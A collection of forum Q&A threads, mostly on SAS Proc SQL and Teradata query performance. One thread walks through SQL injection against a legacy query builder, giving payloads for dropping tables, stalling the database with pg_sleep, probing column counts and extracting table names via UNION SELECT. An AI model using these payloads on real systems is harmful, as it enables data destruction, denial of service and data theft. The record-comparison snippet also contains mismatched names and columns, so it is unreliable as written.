SAS Macro variable to represent what is in an IN statement in Proc SQL

I have a query I want to run through SAS in Proc SQL where I am getting data from one of our company databases. At the top of the query, for ease of use mostly, I want to be able to put a list of input variables. I am interested in getting data only in certain dates and certain states. The dates I care about are contiguous so I just make a SAS macro variable for the start date and end date and use a between statement. That's easy enough. But, for the states, I can't do such a thing. So, my thought was to do something like
%LET States = ('CT', 'MD', 'ME', 'NC', 'WV');
and then later on, I want to do a where statement
WHERE (State_Tp IN &States)
Now, this does not work. And, I've tried several other variations but I can't seem to get it to work. Is something like this possible?
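To make the intent concrete, here is a rough sketch of the full filter I'm after (the date macro variables, table name, and date column below are just placeholders, not my real names):
%LET DateStart = '01JAN2013'd;
%LET DateEnd   = '30JUN2013'd;
%LET States    = ('CT', 'MD', 'ME', 'NC', 'WV');
proc sql;
create table want as
select *
from mydb.policy_data            /* placeholder table name */
where trans_date between &DateStart and &DateEnd
and State_Tp in &States;
quit;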

While your code is fine as is, a better solution (one that may have fewer issues anyway) is to create a dataset with the desired states and join against it (or use an EXISTS clause if that better suits your needs). This is easier to maintain (you can keep the list in an easily editable format separate from the code, such as an Excel sheet) and may be faster in some cases.
data states;
input state_tp $;
datalines;
CT
MD
ME
NC
WV
;;;;
run;
proc sql;
create table test as
select z.*
from sashelp.zipcode z
inner join
states s
/* sashelp.zipcode stores the two-letter state abbreviation in STATECODE */
on z.statecode=s.state_tp;
quit;
or
proc sql;
create table test as
select * from sashelp.zipcode z
where exists (
select 1 from states s
where s.state_tp=z.statecode);
quit;

Related

why the proc sort is way quicker than an insert select

I have a table with many duplicate lines.
Let's say I have table A with 10 million lines and a single column without an index or primary key.
First, I created another table, B, and did this:
INSERT INTO B (col1) SELECT DISTINCT (col1) FROM A;
The issue is that the performance is slow. Then I found this command:
proc sort data=A out=B noduprecs;
by col1;
run;
It took only 2 seconds.
Why is it faster (and therefore better) to use a proc sort than an insert select?
How does proc sort work, and how is it ultimately able to deal with so many lines without any indexes?
I could not find anything on the net for the explanations.
TIA
I think we need to know a little more about your SAS configuration, as I'm definitely not seeing the same results as you. This is the code I used to test:
Test code
Create some test data, 10M rows, with a random integer between 0 and 1000:
data x;
do cnt=1 to 10000000;
x = floor(rand("Uniform") * 1000);
output;
end;
drop cnt;
run;
Try sorting it and keeping distinct values using proc sort. Run this multiple times to get an average time:
proc sort data=x out=test1 nodupkey;
by x;
run;
Try using the proc sql method. Again, run it multiple times to get an average time:
proc sql noprint;
create table test2 as
select distinct x
from x
order by 1
;
quit;
Try using the 'insert into' method. Run multiple times:
proc sql noprint;
create table b like x;
insert into b (x) select distinct (x) from x;
quit;
Results
On my machine (SAS 9.4, Windows 64-bit), the proc sort took about 4 seconds on average and the sql sort took about 5 seconds. So yes, the proc sort did run a little faster for this dataset. Changing the number of rows, columns, field type being sorted on, and cardinality of the key can all change these results.
The insert into statement ran the quickest at 3.2 seconds. Is the table that you are writing to a SAS dataset, or is it located in another database? This will have the biggest impact on your results and should be the determining factor when choosing which step to run.
You could be even faster with
proc sort data=A(keep=col1) out=B nodupkey;
by col1;
run;
Try to compare INSERT and SORT with:
proc sql;
create table B as select distinct col1 from A;
quit;
Experience simply teaches us that PROC SORT is faster than sorting/DISTINCT in the PROC SQL implementation. It's just not an official statement; it doesn't hold for all situations and not always by such a degree.
Are tables A and B in a SAS Base libname?
The problem with the INSERT version could also be that, since the target table is predefined, there is presumably some checking that each inserted value fits into the target fields, which may be less expensive when creating a new table.

How to do damage with SQL by adding to the end of a statement?

Perhaps I am not creative or knowledgeable enough with SQL... but it looks like there is no way to do a DROP TABLE or DELETE FROM within a SELECT without the ability to start a new statement.
Basically, we have a situation where our codebase has some gigantic, "less-than-robust" SQL generation component that never uses prepared statements and we now have an API that interacts with this legacy component.
Right now we can modify a query by appending to the end of it, but have been unable to insert any semicolons. Thus, we can do something like this:
/query?[...]&location_ids=loc1')%20or%20L1.ID%20in%20('loc2
which will result in this
SELECT...WHERE L1.PARENT_ID='1' and L1.ID IN ('loc1') or L1.ID in ('loc2');...
This is just one example.
Basically we can append pretty much anything to the end of any/most generated SQL queries, short of adding a semicolon.
Any ideas on how this could potentially do some damage? Can you add something to the end of a SQL query that deletes from or drops tables? Or create a query so absurd that it takes up all CPU and never completes?
You said that this:
/query?[...]&location_ids=loc1')%20or%20L1.ID%20in%20('loc2
will result in this:
SELECT...WHERE L1.PARENT_ID='1' and L1.ID IN ('loc1') or L1.ID in ('loc2');
so it looks like this:
/query?[...]&location_ids=');DROP%20TABLE users;--
will result in this:
SELECT...WHERE L1.PARENT_ID='1' and L1.ID IN ('');DROP TABLE users;--');
which is a SELECT, a DROP and a comment.
If it’s not possible to inject another statement, you’re limited to the existing statement and its abilities.
Like in this case, if you are limited to SELECT and you know where the injection happens, have a look at PostgreSQL’s SELECT syntax to see what your options are. Since you’re injecting into the WHERE clause, you can only inject additional conditions or other clauses that are allowed after the WHERE clause.
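For example, since you can append conditions, a time- or CPU-consuming subquery is one plausible way to do damage even without a second statement (a sketch in the same style as the question's payloads; pg_sleep and generate_series are standard PostgreSQL functions):
loc1') AND 1=(SELECT 1 FROM pg_sleep(60)) --
loc1') AND (SELECT count(*) FROM generate_series(1,100000000)) > 0 --
The first simply makes the query hang for 60 seconds; the second burns CPU generating and counting a hundred million rows.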
If the result of the SELECT is returned back to the user, you may want to add your own SELECT with a UNION operation. However, PostgreSQL requires compatible data types for corresponding columns:
The two SELECT statements that represent the direct operands of the UNION must produce the same number of columns, and corresponding columns must be of compatible data types.
So you would need to know the number and data types of the columns of the original SELECT first.
The number of columns can be detected with the ORDER BY clause by specifying the column number like ORDER BY 3, which would order the result by the values of the third column. If the specified column does not exist, the query will fail.
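As a sketch of that probing step, using the same loc1-style injection point as above:
loc1') ORDER BY 1 --
loc1') ORDER BY 5 --
If the first succeeds and the second fails, the column count is between 1 and 4; keep adjusting the number until you find the largest value that still works.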
Now after determining the number of columns, you can inject a UNION SELECT with the appropriate number of columns with an null value for each column of your UNION SELECT:
loc1') UNION SELECT null,null,null,null,null --
Now you determine the types of each column by using a different value for each column, one by one. If the type of a column is incompatible, you may get an error that hints at the expected data type, like:
ERROR: invalid input syntax for integer
ERROR: UNION types text and integer cannot be matched
After you have determined enough column types (one column may be sufficient when it’s one that is presented to the user), you can change your SELECT to select whatever you want.
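As a sketch of that last step, assuming three columns were found and the second turned out to be text, a payload that lists table names from the standard information_schema catalog might look like this (the cast just avoids type-mismatch complaints):
loc1') UNION SELECT null, table_name::text, null FROM information_schema.tables --
The same pattern then works against any other catalog or application table the database user can read.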

Writing Efficient Queries in SAS Using Proc sql with Teradata

EDIT: Here is a more complete set of code that shows exactly what's going on per the answer below.
libname output '/data/files/jeff';
%let DateStart = '01Jan2013'd;
%let DateEnd = '01Jun2013'd;
proc sql;
CREATE TABLE output.id AS (
SELECT DISTINCT id
FROM mydb.sale_volume AS sv
WHERE sv.category IN ('a', 'b', 'c') AND
sv.trans_date BETWEEN &DateStart AND &DateEnd
);
CREATE TABLE output.sums AS (
SELECT sv.id, SUM(sv.sales) AS total_sales
FROM mydb.sale_volume AS sv
INNER JOIN output.id AS ids
ON ids.id = sv.id
WHERE sv.trans_date BETWEEN &DateStart AND &DateEnd
GROUP BY sv.id
);
quit;
The goal is to simply query the table for some id's based on category membership. Then I sum these members' activity across all categories.
The above approach is far slower than:
Running the first query to get the subset
Running a second query that sums every ID
Running a third query that inner joins the two result sets.
If I'm understanding correctly, it may be more efficient to make sure that all of my code is completely passed through rather than cross-loading.
After I posted a question yesterday, a member suggested I might benefit from asking a separate question on performance that was more specific to my situation.
I'm using SAS Enterprise Guide to write some programs/data queries. I don't have permissions to modify the underlying data, which is stored in 'Teradata'.
My basic problem is writing efficient SQL queries in this environment. For example, I query a large table (with tens of millions of records) for a small subset of ID's. Then, I use this subset to query the larger table again:
proc sql;
CREATE TABLE subset AS (
SELECT
id
FROM
bigTable
WHERE
someValue = x AND
date BETWEEN a AND b
);
quit;
This works in a matter of seconds and returns 90k ID's. Next, I want to query this set of ID's against the big table, and problems ensue. I'm wanting to sum values over time for the ID's:
proc sql;
CREATE TABLE subset_data AS (
SELECT
bigTable.id,
SUM(bigTable.value) AS total
FROM
bigTable
INNER JOIN subset
ON subset.id = bigTable.id
WHERE
bigTable.date BETWEEN a AND b
GROUP BY
bigTable.id
);
quit;
For whatever reason, this takes a really long time. The difference is that the first query flags 'someValue'. The second looks at all activity, regardless of what's in 'someValue'. For example, I could flag every customer who orders a pizza. Then I would look at every purchase for all customers who ordered pizza.
I'm not overly familiar with SAS so I'm looking for any advice on how to do this more efficiently or speed things up. I'm open to any thoughts or suggestions and please let me know if I can offer more detail. I guess I'm just surprised the second query takes so long to process.
The most critical thing to understand when using SAS to access data in Teradata (or any other external database, for that matter) is that the SAS software prepares SQL and submits it to the database. The idea is to try and relieve you (the user) from all the database-specific details. SAS does this using a concept called "implicit pass-through", which just means that SAS does the translation from SAS code into DBMS code. Among the many things that occur is data type conversion: SAS has only two data types, numeric and character.
SAS deals with translating things for you, but it can be confusing. For example, I've seen "lazy" database tables defined with VARCHAR(400) columns holding values that never exceed some smaller length (like a column for a person's name). In the database this isn't much of a problem, but since SAS does not have a VARCHAR data type, it creates a variable 400 characters wide for each row. Even with dataset compression, this can make the resulting SAS dataset unnecessarily large.
The alternative is to use "explicit pass-through", where you write native queries using the actual syntax of the DBMS in question. These queries execute entirely on the DBMS and return results back to SAS (which still does the data type conversion for you). For example, here is a "pass-through" query that joins two tables and creates a SAS dataset as the result:
proc sql;
connect to teradata (user=userid password=password mode=teradata);
create table mydata as
select * from connection to teradata (
select a.customer_id
, a.customer_name
, b.last_payment_date
, b.last_payment_amt
from base.customers a
join base.invoices b
on a.customer_id=b.customer_id
where b.bill_month = date '2013-07-01'
and b.paid_flag = 'N'
);
quit;
Notice that everything inside the pair of parentheses is native Teradata SQL and that the join operation itself is running inside the database.
The example code you have shown in your question is NOT a complete, working example of a SAS/Teradata program. To better assist, you need to show the real program, including any library references. For example, suppose your real program looks like this:
proc sql;
CREATE TABLE subset_data AS
SELECT bigTable.id,
SUM(bigTable.value) AS total
FROM TDATA.bigTable bigTable
JOIN TDATA.subset subset
ON subset.id = bigTable.id
WHERE bigTable.date BETWEEN a AND b
GROUP BY bigTable.id
;
That would indicate a previously assigned LIBNAME statement through which SAS was connecting to Teradata. The syntax of that WHERE clause would be very relevant to whether SAS is even able to pass the complete query to Teradata. (Your example doesn't show what "a" and "b" refer to.) It is very possible that the only way SAS can perform the join is to drag both tables back into a local work session and perform the join on your SAS server.
One thing I can strongly suggest is that you try to convince your Teradata administrators to allow you to create "driver" tables in some utility database. The idea is that you would create a relatively small table inside Teradata containing the ID's you want to extract, then use that table to perform explicit joins. I'm sure you would need a bit more formal database training to do that (like how to define a proper index and how to "collect statistics"), but with that knowledge and ability, your work will just fly.
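A rough sketch of that idea, reusing the table and column names from the EDIT in the question, and assuming a utility database called utildb, an integer id, and the same connection options as the pass-through example above:
proc sql;
connect to teradata (user=userid password=password mode=teradata);
/* 1. build a small driver table of IDs inside Teradata (utildb is assumed) */
execute (
create table utildb.id_driver (id integer)
unique primary index (id)
) by teradata;
execute (
insert into utildb.id_driver
select distinct id
from mydb.sale_volume
where category in ('a','b','c')
and trans_date between date '2013-01-01' and date '2013-06-01'
) by teradata;
/* 2. collect statistics so the optimizer knows the driver table is small */
execute (collect statistics on utildb.id_driver column (id)) by teradata;
/* 3. join explicitly inside Teradata and pull back only the summed result */
create table sums as
select * from connection to teradata (
select sv.id, sum(sv.sales) as total_sales
from mydb.sale_volume sv
join utildb.id_driver d
on d.id = sv.id
where sv.trans_date between date '2013-01-01' and date '2013-06-01'
group by sv.id
);
disconnect from teradata;
quit;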
I could go on and on but I'll stop here. I use SAS with Teradata extensively every day against what I'm told is one of the largest Teradata environments on the planet. I enjoy programming in both.
You imply an assumption that the 90k records in your first query are all unique ids. Is that definite?
I ask because the implication from your second query is that they're not unique.
- One id can have multiple values over time, and have different somevalues
If the ids are not unique in the first dataset, you need to GROUP BY id or use DISTINCT in the first query (see the sketch below).
Imagine that the 90k rows consist of 30k unique ids, and so have an average of 3 rows per id.
And then imagine those 30k unique ids actually have 9 records each in your time window, including rows where somevalue <> x.
You will then get 3 x 9 = 27 records back per id.
And as those two numbers grow, the number of records in your second query grows multiplicatively.
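A minimal sketch of that first query with DISTINCT added, using the same placeholder names as the question:
proc sql;
CREATE TABLE subset AS (
SELECT DISTINCT
id
FROM
bigTable
WHERE
someValue = x AND
date BETWEEN a AND b
);
quit;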
Alternative Query
If that's not the problem, an alternative query (which is not ideal, but possible) would be...
SELECT
bigTable.id,
SUM(bigTable.value) AS total
FROM
bigTable
WHERE
bigTable.date BETWEEN a AND b
GROUP BY
bigTable.id
HAVING
MAX(CASE WHEN bigTable.somevalue = x THEN 1 ELSE 0 END) = 1
If ID is unique and a single value, then you can try constructing a format.
Create a dataset that looks like this:
fmtname, start, label
where fmtname is the same for all records and is a legal format name (begins and ends with a letter, contains alphanumerics or _); start is the ID value; and label is 1. Then add one row with the same value for fmtname, a blank start, a label of 0, and another variable, hlo='o' (for 'other'). Then import it into proc format using the CNTLIN option, and you now have a 1/0 lookup format.
Here's a brief example using SASHELP.CLASS. ID here is name, but it can be numeric or character - whichever is right for your use.
data for_fmt;
set sashelp.class;
retain fmtname '$IDF'; *Format name is up to you. Should have $ if ID is character, no $ if numeric;
start=name; *this would be your ID variable - the look up;
label='1';
output;
if _n_ = 1 then do;
hlo='o';
call missing(start);
label='0';
output;
end;
run;
proc format cntlin=for_fmt;
quit;
Now instead of doing a join, you can do your query 'normally' but with an additional where clause of and put(id,$IDF.)='1'. This won't be optimized with an index or anything, but it may be faster than the join. (It may also not be faster - depends on how the SQL optimizer is working.)
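A sketch of what that looks like, reusing the placeholder names from the question (note that put() will not be passed down to a database, so this is most useful when the data is in a SAS dataset or is being pulled back to SAS anyway):
proc sql;
CREATE TABLE subset_data AS
SELECT id,
SUM(value) AS total
FROM bigTable
WHERE date BETWEEN a AND b
AND put(id, $IDF.) = '1'
GROUP BY id;
quit;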
If the id is unique you might add a UNIQUE PRIMARY INDEX(id) to that table, otherwise it defaults to a Non-unique PI.
Knowing about uniqueness helps the optimizer to produce a better plan.
Without more info like an Explain (just put EXPLAIN in front of the SELECT) it's hard to tell how this can be improved.
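For instance, in Teradata SQL (a sketch, with the same placeholder names as the question and an assumed database for the driver table):
CREATE TABLE mydb.subset (id INTEGER)
UNIQUE PRIMARY INDEX (id);

EXPLAIN
SELECT bigTable.id, SUM(bigTable.value) AS total
FROM bigTable
JOIN mydb.subset s
ON s.id = bigTable.id
WHERE bigTable.date BETWEEN a AND b
GROUP BY bigTable.id;
The EXPLAIN output shows how Teradata plans to execute the join and where the time is expected to go.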
One alternate solution is to use SAS procedures. I don't know what your actual SQL is doing, but if you're just doing frequencies (or something else that can be done in a PROC), you could do:
proc sql;
create view blah as select ... (your join);
quit;
proc freq data=blah;
tables id/out=summary(rename=(count=total) keep=id count);
run;
Or any number of other options (PROC MEANS, PROC TABULATE, etc.). That may be faster than doing the sum in SQL (depending on details such as how your data is organized, what you're actually doing, and how much memory you have available). It has the added benefit that SAS might choose to do this in-database if you create the view in the database, which might be faster. (In fact, it's possible that just running the freq off the base table and then joining the results to the smaller table would be even faster.)

how to prove 2 sql statements are equivalent

I set out to rewrite a complex SQL statement with joins and sub-statements and obtained a simpler-looking statement. I tested it by running both on the same data set and getting the same result set. In general, how can I (conceptually) prove that the two statements are equivalent on any given data set?
I would suggest studying relational algebra (as pointed out by Mchl). It is the most essential concept you need if you want to get serious about optimizing queries and designing databases properly.
However, I will suggest an ugly brute-force approach that helps you ensure correct results if you have sufficient data to test with: create views of both versions (to make the comparisons easier to manage) and compare the results. I mean something like:
create view original as select xxx yyy zzz;
create view new as select xxx yyy zzz;
-- If the amount differs something is quite obviously very wrong
select count(*) from original;
select count(*) from new;
-- What is missing from the new one?
select *
from original o
where not exists (
select *
from new n
where o.col1=n.col1 and o.col2=n.col2 --and so on
);
-- Did something extra appear?
select *
from new o
where not exists (
select *
from old n
where o.col1=n.col2 and o.col2=n.col2 --and so on
)
Also, as pointed out by others in the comments, you might feed both queries to the optimizer of the product you are working with. Most of the time you get something that can be parsed by humans: complete drawings of the execution paths, the subqueries' impact on performance, etc. It is most often done with something like:
explain plan for
select *
from ...
where ...
etc

Is there a way to rename a similarly named column from two tables when performing a join?

I have two tables that I am joining with the following query...
select *
from Partners p
inner join OrganizationMembers om on p.ParID = om.OrganizationId
where om.EmailAddress = 'my_email#address.com'
and om.deleted = 0
This works great, but I want some of the columns from Partners to be replaced by similarly named columns from OrganizationMembers. The number of columns I want to replace in the joined result is small, no more than 3.
It is possible to get the result I want by selectively choosing the columns I want in the resulting join like so...
select om.MemberID,
p.ParID,
p.Levelz,
p.encryptedSecureToken,
p.PartnerGroupName,
om.EmailAddress,
om.FirstName,
om.LastName
from Partners p
inner join OrganizationMembers om on p.ParID = om.OrganizationId
where om.EmailAddress = 'my_email#address.com'
and om.deleted = 0
But this creates a very long sequence of select p.a, p.b, p.c, p.d, ... etc ... which I am trying to avoid.
In summary I am trying to get several columns from the Partners table and up to 3 columns from the OrganizationMembers table without having a long column specification sequence at the beginning of the query. Is it possible or am I just dreaming?
select om.MemberID as mem
Use the AS keyword. This is called aliasing.
You are dreaming in your implementation.
Also, as a best practice, select * is something that is typically frowned upon by DBAs.
If you want to limit the results or change anything, you must explicitly name the columns; as a potential "stop gap" you could do something like this:
SELECT p.*, om.MemberId, etc..
But this ONLY works if you want ALL columns from the first table, and then selected items.
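Combining the two ideas against the tables from the question (a sketch; the alias names on the renamed columns are made up):
select p.*,
om.MemberID,
om.EmailAddress as MemberEmailAddress,
om.FirstName as MemberFirstName,
om.LastName as MemberLastName
from Partners p
inner join OrganizationMembers om on p.ParID = om.OrganizationId
where om.EmailAddress = 'my_email#address.com'
and om.deleted = 0
You still get every column from Partners without typing them out, plus just the handful of OrganizationMembers columns, renamed so they don't collide.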
Try this:
p.*,
om.EmailAddress,
om.FirstName,
om.LastName
You should never use * though. Always specifying the columns you actually need makes it easier to see what is happening.
But this creates a very long sequence of select p.a, p.b, p.c, p.d, ... etc ... which I am trying to avoid.
Don't avoid it. Embrace it!
There are lots of reasons why it's best practice to explicitly list the desired columns.
It's easier to do searches for where a particular column is being used.
The behavior of the query is more obvious to someone who is trying to maintain it.
Adding a column to the table won't automatically change the behavior of your query.
Removing a column from the table will break your query earlier, making bugs appear closer to the source, and easier to find and fix.
And anything that uses the query is going to have to list all the columns anyway, so there's no point being lazy about it!